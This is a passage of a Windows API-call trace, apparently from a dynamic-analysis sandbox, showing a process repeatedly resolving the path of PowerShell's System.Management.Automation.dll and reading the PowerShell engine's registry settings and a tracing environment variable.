	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.707] GetCurrentProcessId () returned 0xaf4
	[0409.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db98 | out: phkResult=0x28db98*=0x36c) returned 0x0
	[0409.712] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28db1c, lpData=0x0, lpcbData=0x28db18*=0x0 | out: lpType=0x28db1c*=0x1, lpData=0x0, lpcbData=0x28db18*=0x56) returned 0x0
	[0409.712] CoTaskMemAlloc (cb=0x5a) returned 0x1b766270
	[0409.712] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28daec, lpData=0x1b766270, lpcbData=0x28dae8*=0x56 | out: lpType=0x28daec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dae8*=0x56) returned 0x0
	[0409.712] CoTaskMemFree (pv=0x1b766270) 
	[0409.712] RegCloseKey (hKey=0x36c) returned 0x0
	[0409.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.715] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0409.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.715] CoTaskMemFree (pv=0x147db0) 
	[0409.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
